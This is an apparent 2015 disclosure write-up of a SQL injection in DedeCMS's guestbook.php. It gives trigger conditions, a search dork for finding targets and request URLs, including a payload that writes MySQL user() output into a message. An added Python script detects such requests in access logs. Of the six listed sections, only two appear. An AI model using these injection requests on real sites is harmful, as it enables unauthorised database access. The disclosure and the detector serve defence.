myhack58 | LittleHann | MYHACK58:62201562725
May 22, 2015 - 12:00 a.m.

dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

2015-05-22 00:00:00
LittleHann
www.myhack58.com
  1. Vulnerability description
  2. Vulnerability trigger conditions
  3. Affected scope
  4. Vulnerability code analysis
  5. Defense method
  6. Offensive and defensive thinking


1. Vulnerability description

Successful exploitation of the injection requires the following conditions:

  1. php magic_quotes_gpc=off
  2. The vulnerable file exists: plus/guestbook.php
  3. The database table dede_guestbook must also exist

Relevant Link:

inurl:/plus/guestbook.php

2. Vulnerability trigger condition


  1. Open http://localhost/dedecms5.7/plus/guestbook.php
  2. The [Reply/edit] link shows the visitor message ID. Note the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
  3. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=1
  4. After submitting, if this is DedeCMS 5.7, the page shows "successfully changed or replying to a message", which indicates that the modification succeeded.
  5. Then return to http://localhost/dedecms5.7/plus/guestbook.php and check whether the content of the modified message has changed to errs.cc'. If it has, this vulnerability cannot be exploited here, because exploitation requires php magic_quotes_gpc=off.
  6. If the modification did not succeed and the content of that message ID is still the previous content, the vulnerability can be exploited.
  7. Then visit: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=',msg=user(),email='
  8. Return to the guestbook page: the content of that message ID has been replaced directly with the result of MySQL user().
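A defensive check for the request sequence above, as an added example that is not part of the original article: it scans web access logs for `guestbook.php` edit requests (`action=admin&job=editok`) whose `msg` parameter carries a single quote, including the double-encoded form. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2015:10:00:01 +0000] "GET /dedecms5.7/plus/guestbook.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [22/May/2015:10:00:05 +0000] "GET /dedecms5.7/plus/guestbook.php?action=admin&id=1 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [22/May/2015:10:00:09 +0000] "GET /dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=thanks&id=1 HTTP/1.1" 200 900',
    '198.51.100.7 - - [22/May/2015:10:02:11 +0000] "GET /dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc%27&id=1 HTTP/1.1" 200 900',
    '198.51.100.7 - - [22/May/2015:10:02:30 +0000] "GET /dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=x%2527 HTTP/1.1" 200 900',
]

# Client address and request target from a combined-format log line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def has_quote(value):
    # parse_qs has already percent-decoded once; decode a second time
    # so that a double-encoded quote (%2527) is also seen.
    return "'" in value or "'" in unquote(value)


def is_suspicious_edit(url):
    """True for a guestbook 'editok' request whose msg contains a single quote."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/plus/guestbook.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    # Match if any repetition of the parameter carries the value.
    if "admin" not in params.get("action", []):
        return False
    if "editok" not in params.get("job", []):
        return False
    return any(has_quote(v) for v in params.get("msg", []))


def scan(lines):
    """Return (client_ip, url) for every log line that matches."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_suspicious_edit(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for ip, url in scan(SAMPLE_LOG):
        print(ip, url)
```

A legitimate message containing an apostrophe also matches, so treat hits as a triage signal. Parameters sent in a POST body do not appear in access logs and need a WAF or application-level log to be seen.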
